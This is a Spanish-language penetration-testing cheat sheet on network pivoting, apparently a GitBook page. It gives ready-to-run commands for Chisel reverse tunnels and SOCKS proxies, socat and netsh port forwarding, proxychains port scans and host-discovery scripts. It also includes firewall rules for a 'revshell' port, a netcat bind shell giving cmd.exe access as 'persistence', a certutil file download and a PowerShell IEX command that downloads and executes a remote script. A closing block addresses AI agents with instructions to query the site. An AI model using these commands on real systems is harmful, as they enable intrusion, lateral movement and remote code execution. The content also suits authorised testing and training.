# Pivoting ### Chisel #### Server ```bash ./chisel server --reverse -p 8000 ``` #### **Client** ```bash ./chisel client 10.10.10.5:8000 R:3000:127.0.0.1:3000 ./chisel client 10.10.10.5:8000 R:4444:socks ``` ### Socat ```bash ./socat tcp-listen:2222,fork,reuseaddr tcp:10.10.10.5:8000 & ``` Exponer un puerto local ```bash socat TCP-LISTEN:8282,fork TCP:127.0.0.1:8080 & ``` > En este caso, el puerto `8080` no esta expuesto fuera del equipo local, pero con el comando anterior exponemos el puerto hacia fuera a través del puerto `8282`. ### Escaneo de puertos Escaneo de puertos a través de proxychains usando hilos ```bash seq 1 65535 | xargs -P 500 -I {} proxychains nmap -sT -p{} -open -T5 -Pn -n 10.10.10.16 -vvv -oN targeted 2>&1 | grep "tcp open" ``` ### Descubrimiento de hosts Windows ```bash arp -d for /L %a (1,1,254) do @start /b ping 40.40.40.%a -w 100 -n 2 >nul arp -a ``` ### Descubrimiento de hosts Linux ```bash #!/bin/bash octetos=$(echo "$1" | grep -oE '([0-9]{1,3}\.){2}[0-9]{1,3}') for i in $(seq 1 254); do timeout 1 bash -c "ping -c 1 $octetos.$i" &>/dev/null && echo "[+] Host $octetos.$i - ACTIVE" & done; wait ``` ```bash ./host-discovery.sh 192.168.1.0 ``` ### Descubrimiento de hosts Linux (alternativa) Si la máquina no cuenta con la utilidad `ping`, podemos utilizar el siguiente script como alternativa: ```bash #!/bin/bash octetos=$(echo "$1" | grep -oE '([0-9]{1,3}\.){2}[0-9]{1,3}') for i in $(seq 1 254); do timeout 1 bash -c "echo >/dev/tcp/$octetos.$i/80" &>/dev/null && echo "[+] Host $octetos.$i - ACTIVE" & done wait ``` ```bash ./host-discovery.sh 192.168.1.0 ``` ### Descubrimiento de puertos abiertos Linux ```bash #!/bin/bash for port in $(seq 1 65535); do timeout 1 bash -c "echo '' > /dev/tcp/$1/$port" 2>/dev/null && echo "[+] Port $port - OPEN" & done; wait ``` ```bash ./port-discovery.sh 192.168.1.10 ``` ### Netsh #### **Mostrar la configuración actual del reenvío de puertos.** ```powershell netsh interface portproxy show all ``` #### **Port Forwarding** ```powershell netsh interface portproxy add v4tov4 listenport=4444 listenaddress=0.0.0.0 connectport=5555 connectaddress=20.20.20.2 ``` #### **Abrir puertos en el Firewall** ```powershell netsh advfirewall firewall add rule name=revshell protocol=TCP dir=in localport=4444 action=allow (IN) netsh advfirewall firewall add rule name=revshell protocol=TCP dir=out localport=4444 action=allow (OUT) ``` ### **Establecer una "persistencia" en Windows** Enviamos a segundo plano el proceso, abriendo un puerto para luego tener acceso más facil. ```powershell start "" /B nc.exe -l -p 10000 -e cmd.exe ``` ```bash proxychains rlwrap nc 10.10.10.6 -p 10000 ``` ### **Descargar un archivo desde Windows (cmd)** ```powershell certutil -split -urlcache -f http://192.168.1.11/chisel.exe chisel.exe ``` ### Descargar un archivo desde Windows (Powershell) ```powershell IEX(New-Object Net.Webclient).downloadString('http://192.168.1.10/PowerView.ps1') ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://d4redevil.gitbook.io/d4redevil/cheatsheet/pivoting.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.